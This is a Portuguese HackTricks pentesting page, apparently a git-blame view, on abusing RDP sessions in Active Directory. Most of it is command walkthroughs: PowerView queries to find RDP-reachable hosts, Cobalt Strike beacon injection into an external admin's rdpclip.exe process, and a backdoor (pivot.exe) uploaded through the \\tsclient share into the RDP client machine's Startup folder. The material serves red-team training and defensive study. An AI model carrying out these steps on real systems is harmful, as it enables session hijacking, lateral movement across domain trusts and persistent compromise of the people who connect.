hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md

96 lines
5.3 KiB
Markdown
Raw Normal View History

# Abuso de Sessões RDP
2022-08-16 00:18:24 +00:00
<details>
<summary><strong>Aprenda hacking AWS do zero ao avançado com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
2022-08-16 00:18:24 +00:00
## Injeção de Processo RDP
Se o **grupo externo** tiver **acesso RDP** a qualquer **computador** no domínio atual, um **atacante** poderia **comprometer esse computador e aguardar por ele**.
Uma vez que o usuário tenha acessado via RDP, o **atacante pode pivotar para a sessão desse usuário** e abusar de suas permissões no domínio externo.
2022-08-16 00:18:24 +00:00
```powershell
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
2022-08-16 00:18:24 +00:00
beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user
```
Verifique **outras maneiras de roubar sessões com outras ferramentas** [**nesta página.**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
2022-08-16 00:18:24 +00:00
## RDPInception
Se um usuário acessar via **RDP em uma máquina** onde um **atacante** está **aguardando** por ele, o atacante será capaz de **injetar um beacon na sessão RDP do usuário** e se a **vítima montou seu drive** ao acessar via RDP, o **atacante poderia acessá-lo**.
2022-08-16 00:18:24 +00:00
Neste caso, você poderia simplesmente **comprometer** o **computador original das vítimas** escrevendo um **backdoor** na **pasta de inicialização**.
2022-08-16 00:18:24 +00:00
```powershell
# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
2022-08-16 00:18:24 +00:00
beacon> inject 4960 x64 tcp-local
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c
Size Type Last Modified Name
---- ---- ------------- ----
dir 02/10/2021 04:11:30 $Recycle.Bin
dir 02/10/2021 03:23:44 Boot
dir 02/20/2021 10:15:23 Config.Msi
dir 10/18/2016 01:59:39 Documents and Settings
[...]
2022-08-16 00:18:24 +00:00
# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
```
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-08-16 00:18:24 +00:00
Outras maneiras de apoiar o HackTricks:
2022-08-16 00:18:24 +00:00
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
2022-08-16 00:18:24 +00:00
</details>